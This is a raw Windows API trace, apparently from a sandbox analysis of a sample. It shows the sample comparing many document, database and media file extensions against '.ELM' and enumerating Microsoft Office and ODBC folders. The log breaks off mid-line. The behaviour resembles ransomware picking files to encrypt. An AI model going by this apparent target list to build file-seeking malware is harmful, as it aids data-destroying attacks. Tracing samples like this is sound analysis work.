[0317.356] lstrlenW (lpString=".dat") returned 4 [0317.356] lstrcmpiW (lpString1=".dat", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".db") returned 3 [0317.356] lstrcmpiW (lpString1=".db", lpString2="ELM") returned -1 [0317.356] lstrlenW (lpString=".dbf") returned 4 [0317.356] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".dbx") returned 4 [0317.357] lstrcmpiW (lpString1=".dbx", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dc3") returned 4 [0317.357] lstrcmpiW (lpString1=".dc3", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dcm") returned 4 [0317.357] lstrcmpiW (lpString1=".dcm", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dcr") returned 4 [0317.357] lstrcmpiW (lpString1=".dcr", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".der") returned 4 [0317.357] lstrcmpiW (lpString1=".der", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dib") returned 4 [0317.357] lstrcmpiW (lpString1=".dib", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dic") returned 4 [0317.357] lstrcmpiW (lpString1=".dic", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dif") returned 4 [0317.357] lstrcmpiW (lpString1=".dif", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".divx") returned 5 [0317.357] lstrcmpiW (lpString1=".divx", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".djvu") returned 5 [0317.357] lstrcmpiW (lpString1=".djvu", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".dng") returned 4 [0317.357] lstrcmpiW (lpString1=".dng", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".doc") returned 4 [0317.357] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".docm") returned 5 [0317.357] lstrcmpiW (lpString1=".docm", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".docx") returned 5 [0317.357] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".dot") returned 4 [0317.357] lstrcmpiW (lpString1=".dot", lpString2=".ELM") returned -1 [0317.357] lstrlenW (lpString=".dotm") returned 5 [0317.357] lstrcmpiW (lpString1=".dotm", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".dotx") returned 5 [0317.357] lstrcmpiW (lpString1=".dotx", lpString2="E.ELM") returned -1 [0317.357] lstrlenW (lpString=".dpx") returned 4 [0317.358] lstrcmpiW (lpString1=".dpx", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dqy") returned 4 [0317.358] lstrcmpiW (lpString1=".dqy", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dsn") returned 4 [0317.358] lstrcmpiW (lpString1=".dsn", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dt") returned 3 [0317.358] lstrcmpiW (lpString1=".dt", lpString2="ELM") returned -1 [0317.358] lstrlenW (lpString=".dtd") returned 4 [0317.358] lstrcmpiW (lpString1=".dtd", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dwg") returned 4 [0317.358] lstrcmpiW (lpString1=".dwg", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dwt") returned 4 [0317.358] lstrcmpiW (lpString1=".dwt", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".dx") returned 3 [0317.358] lstrcmpiW (lpString1=".dx", lpString2="ELM") returned -1 [0317.358] lstrlenW (lpString=".dxf") returned 4 [0317.358] lstrcmpiW (lpString1=".dxf", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".edml") returned 5 [0317.358] lstrcmpiW (lpString1=".edml", lpString2="E.ELM") returned -1 [0317.358] lstrlenW (lpString=".efd") returned 4 [0317.358] lstrcmpiW (lpString1=".efd", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".elf") returned 4 [0317.358] lstrcmpiW (lpString1=".elf", lpString2=".ELM") returned -1 [0317.358] lstrlenW (lpString=".emf") returned 4 [0317.358] lstrcmpiW (lpString1=".emf", lpString2=".ELM") returned 1 [0317.358] lstrlenW (lpString=".emz") returned 4 [0317.358] lstrcmpiW (lpString1=".emz", lpString2=".ELM") returned 1 [0317.358] lstrlenW (lpString=".epf") returned 4 [0317.359] lstrcmpiW (lpString1=".epf", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".eps") returned 4 [0317.359] lstrcmpiW (lpString1=".eps", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".epsf") returned 5 [0317.359] lstrcmpiW (lpString1=".epsf", lpString2="E.ELM") returned -1 [0317.359] lstrlenW (lpString=".epsp") returned 5 [0317.359] lstrcmpiW (lpString1=".epsp", lpString2="E.ELM") returned -1 [0317.359] lstrlenW (lpString=".erf") returned 4 [0317.359] lstrcmpiW (lpString1=".erf", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".exr") returned 4 [0317.359] lstrcmpiW (lpString1=".exr", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".f4v") returned 4 [0317.359] lstrcmpiW (lpString1=".f4v", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".fido") returned 5 [0317.359] lstrcmpiW (lpString1=".fido", lpString2="E.ELM") returned -1 [0317.359] lstrlenW (lpString=".flm") returned 4 [0317.359] lstrcmpiW (lpString1=".flm", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".flv") returned 4 [0317.359] lstrcmpiW (lpString1=".flv", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".frm") returned 4 [0317.359] lstrcmpiW (lpString1=".frm", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".fxg") returned 4 [0317.359] lstrcmpiW (lpString1=".fxg", lpString2=".ELM") returned 1 [0317.359] lstrlenW (lpString=".geo") returned 4 [0317.359] lstrcmpiW (lpString1=".geo", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".gif") returned 4 [0317.360] lstrcmpiW (lpString1=".gif", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".grs") returned 4 [0317.360] lstrcmpiW (lpString1=".grs", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".gz") returned 3 [0317.360] lstrcmpiW (lpString1=".gz", lpString2="ELM") returned -1 [0317.360] lstrlenW (lpString=".h") returned 2 [0317.360] lstrcmpiW (lpString1=".h", lpString2="LM") returned -1 [0317.360] lstrlenW (lpString=".hdr") returned 4 [0317.360] lstrcmpiW (lpString1=".hdr", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".hpp") returned 4 [0317.360] lstrcmpiW (lpString1=".hpp", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".hta") returned 4 [0317.360] lstrcmpiW (lpString1=".hta", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".htc") returned 4 [0317.360] lstrcmpiW (lpString1=".htc", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".htm") returned 4 [0317.360] lstrcmpiW (lpString1=".htm", lpString2=".ELM") returned 1 [0317.360] lstrlenW (lpString=".html") returned 5 [0317.360] lstrcmpiW (lpString1=".html", lpString2="E.ELM") returned -1 [0317.361] lstrlenW (lpString=".icb") returned 4 [0317.361] lstrcmpiW (lpString1=".icb", lpString2=".ELM") returned 1 [0317.361] lstrlenW (lpString=".ics") returned 4 [0317.361] lstrcmpiW (lpString1=".ics", lpString2=".ELM") returned 1 [0317.361] lstrlenW (lpString=".iff") returned 4 [0317.361] lstrcmpiW (lpString1=".iff", lpString2=".ELM") returned 1 [0317.361] lstrlenW (lpString=".inc") returned 4 [0317.361] lstrcmpiW (lpString1=".inc", lpString2=".ELM") returned 1 [0317.361] lstrlenW (lpString=".indd") returned 5 [0317.361] lstrcmpiW (lpString1=".indd", lpString2="E.ELM") returned -1 [0317.361] lstrlenW (lpString=".ini") returned 4 [0317.361] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.361] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c3a755, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c3a755, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SONORA", cAlternateFileName="")) returned 1 [0317.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SONORA") returned 97 [0317.362] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.362] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SPRING", cAlternateFileName="")) returned 1 [0317.362] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.362] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x28551719, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x28551719, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0317.363] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.363] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c3a755, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c3a755, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0317.364] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.364] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0317.364] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.364] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27c86bce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0317.365] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.365] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0317.365] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.365] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="WATERMAR", cAlternateFileName="")) returned 0 [0317.366] FindClose (in: hFindFile=0x39485e8 | out: hFindFile=0x39485e8) returned 1 [0317.366] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0317.368] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0317.495] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.519] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8aa06f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8aa06f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ENFR", cAlternateFileName="")) returned 1 [0317.522] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.522] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8aa06f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ESEN", cAlternateFileName="")) returned 1 [0317.523] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.523] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc91c74d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FREN", cAlternateFileName="")) returned 1 [0317.523] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.523] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27cace65, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="MSB1CACH.LEX", cAlternateFileName="")) returned 1 [0317.524] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0317.524] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8c279f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca8c279f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0317.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.525] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8c279f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb5e071a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x42d088, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBE7.DLL", cAlternateFileName="")) returned 1 [0317.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.525] FindNextFileW (in: hFindFile=0x3948a28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf24004e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf24004e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 0 [0317.525] FindClose (in: hFindFile=0x3948a28 | out: hFindFile=0x3948a28) returned 1 [0317.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.525] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52ea133, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0317.527] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.527] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52ea133, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x62b5b1e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x62b5b1e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="Fonts", cAlternateFileName="")) returned 0 [0317.527] FindClose (in: hFindFile=0x39489a8 | out: hFindFile=0x39489a8) returned 1 [0317.527] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.528] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0317.528] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0317.528] FindNextFileW (in: hFindFile=0x39488e8, lpFindFileData=0x2e8e69c | out: lpFindFileData=0x2e8e69c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27d1f57e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x239ec0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0317.528] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.528] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca27806, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xca27806, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0317.528] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0317.528] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.530] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="16", cAlternateFileName="")) returned 0 [0317.530] FindClose (in: hFindFile=0x3948428 | out: hFindFile=0x3948428) returned 1 [0317.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.530] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0317.530] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0317.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0317.531] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e16872b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e16872b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e2272ee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ODBC", cAlternateFileName="")) returned 1 [0317.532] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.532] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e2272ee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e2272ee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e2272ee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data Sources", cAlternateFileName="DATASO~1")) returned 0 [0317.532] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0317.532] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.532] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SYSTEM", cAlternateFileName="")) returned 1 [0317.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.533] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf23b4040, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0317.533] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0317.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: 